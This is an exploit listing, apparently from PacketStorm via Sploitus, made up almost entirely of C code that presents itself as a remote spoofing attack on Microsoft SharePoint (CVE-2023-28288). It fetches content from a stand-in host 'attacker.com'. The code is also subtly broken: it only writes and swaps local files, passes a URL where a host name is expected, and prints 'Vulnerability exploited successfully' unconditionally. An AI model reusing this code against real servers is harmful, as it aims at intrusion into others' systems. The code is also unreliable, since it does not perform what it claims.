## https://sploitus.com/exploit?id=PACKETSTORM:173126
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing  
// Date: 2023-06-20  
// country: Iran  
// Exploit Author: Amirhossein Bahramizadeh  
// Category : Remote  
// Vendor Homepage: (none given)  
// Affected products (as listed by the author, not verified here):  
// Microsoft SharePoint Foundation 2013 Service Pack 1  
// Microsoft SharePoint Server Subscription Edition  
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1  
// Microsoft SharePoint Server 2019  
// Microsoft SharePoint Enterprise Server 2016  
// Tested on: Windows/Linux -- NOTE(review): the code below is Win32/WinINet-only (windows.h, CreateFile, InternetOpen), so it cannot build or run on Linux as written  
// CVE : CVE-2023-28288  
  
#include <windows.h>
#include <wininet.h>   /* InternetOpen/InternetReadFile/...: used below but was never included */

#include <stdio.h>
#include <string.h>    /* strlen */
  
  
// The vulnerable SharePoint server URL  
const char *server_url = "http://example.com/";  
  
// The URL of the fake SharePoint server  
const char *fake_url = "http://attacker.com/";  
  
// The vulnerable SharePoint server file name  
const char *file_name = "vuln_file.aspx";  
  
// The fake SharePoint server file name  
const char *fake_file_name = "fake_file.aspx";  
  
int main()  
{  
HANDLE file;  
DWORD bytes_written;  
char file_contents[1024];  
  
// Create the fake file contents  
sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");  
  
// Write the fake file to disk  
file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);  
if (file == INVALID_HANDLE_VALUE)  
{  
printf("Error creating fake file: %d\n", GetLastError());  
return 1;  
}  
if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))  
{  
printf("Error writing fake file: %d\n", GetLastError());  
CloseHandle(file);  
return 1;  
}  
CloseHandle(file);  
  
// Send a request to the vulnerable SharePoint server to download the file  
sprintf(file_contents, "%s%s", server_url, file_name);  
file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);  
if (file == INVALID_HANDLE_VALUE)  
{  
printf("Error creating vulnerable file: %d\n", GetLastError());  
return 1;  
}  
if (!InternetReadFileUrl(file_contents, file))  
{  
printf("Error downloading vulnerable file: %d\n", GetLastError());  
CloseHandle(file);  
return 1;  
}  
CloseHandle(file);  
  
// Replace the vulnerable file with the fake file  
if (!DeleteFile(file_name))  
{  
printf("Error deleting vulnerable file: %d\n", GetLastError());  
return 1;  
}  
if (!MoveFile(fake_file_name, file_name))  
{  
printf("Error replacing vulnerable file: %d\n", GetLastError());  
return 1;  
}  
  
// Send a request to the vulnerable SharePoint server to trigger the vulnerability  
sprintf(file_contents, "%s%s", server_url, file_name);  
if (!InternetReadFileUrl(file_contents, NULL))  
{  
printf("Error triggering vulnerability: %d\n", GetLastError());  
return 1;  
}  
  
// Print a message indicating that the vulnerability has been exploited  
printf("Vulnerability exploited successfully.\n");  
  
return 0;  
}  
  
BOOL InternetReadFileUrl(const char *url, HANDLE file)  
{  
HINTERNET internet, connection, request;  
DWORD bytes_read;  
char buffer[1024];  
  
// Open an Internet connection  
internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);  
if (internet == NULL)  
{  
return FALSE;  
}  
  
// Connect to the server  
connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);  
if (connection == NULL)  
{  
InternetCloseHandle(internet);  
return FALSE;  
}  
  
// Send the HTTP request  
request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);  
if (request == NULL)  
{  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
if (!HttpSendRequest(request, NULL, 0, NULL, 0))  
{  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
  
// Read the response data  
while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)  
{  
if (file != NULL)  
{  
// Write the data to disk  
if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))  
{  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
}  
}  
  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return TRUE;  
}